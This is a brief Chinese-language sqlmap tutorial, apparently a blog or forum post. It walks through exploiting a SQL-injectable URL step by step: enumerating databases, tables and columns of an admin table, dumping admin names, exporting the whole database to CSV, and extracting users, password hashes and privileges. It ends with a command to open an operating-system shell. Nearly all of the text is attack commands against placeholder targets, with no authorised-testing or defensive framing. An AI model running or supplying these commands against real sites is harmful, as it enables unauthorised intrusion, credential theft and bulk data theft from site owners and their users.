1.查看数据库:python sqlmap -u 存在注入的URL地址 --dbs
以下是结果:
发现2个库。
2.接下来查看表名:
用法:python sqlmap -u 存在注入的URL地址 -D 数据库名(如图的xkb) --tables
3.查看字段:
图中是查看数据库xkb中cms_admin表中字段。结果如下:
4.爆字段内容
爆admin_name的内容。
5.脱裤
-C 字段,字段之间逗号分开。--threads线程数
最后结果会以CSV格式保存。
一些常用命令:
python sqlmap.py -u 注入地址 --is-dba
python sqlmap.py -u 注入地址 --users
python sqlmap.py -u 注入地址 --passwords 查看密码
python sqlmap.py -u 注入地址 --privileges 查看权限
python sqlmap.py -u 注入地址 --os-shell